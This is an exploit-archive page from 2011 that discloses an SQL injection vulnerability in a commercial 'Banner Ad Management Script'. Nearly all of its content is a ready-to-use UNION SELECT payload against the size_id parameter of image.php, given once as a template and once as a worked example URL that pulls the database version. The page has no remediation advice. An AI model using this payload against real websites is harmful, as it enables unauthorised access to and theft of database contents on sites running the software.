Banner Ad Management Script SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Banner Ad Management Script SQL Injection Vulnerability
# Published : 2011-04-03
# Author :
# Previous Title : WordPress WP Custom Pages Plugin 0.5.0.1 LFI Vulnerability
# Next Title : Allomani Web Links 1.0 XSRF Vulnerability (Add Admin)

####################################################################
[+] Exploit Title : Banner Ad Management Script [ Sql Injection Vulnerability]
[+] Author : Egyptian.H4x0rz
[+] Contact : SpY(at)Hotmail.Com
[+] Date : 02-04-2011
[+] Software Link: http://www.softbizscripts.com/banner-ads-management-script-features.php
[+] category: Web Apps [SQli]
[+] HomePage : Black-hat.cc
####################################################################
Vulnerability:
    
*SQL injection Vulnerability*
   
[#] http://patch/image.php?size_id=-1+union+select+1,[sqli],3,4,5,6,7,8,9,10,11
~
[#] eXample
http://www.site.com/ad-manager/image.php?size_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11


####################################################################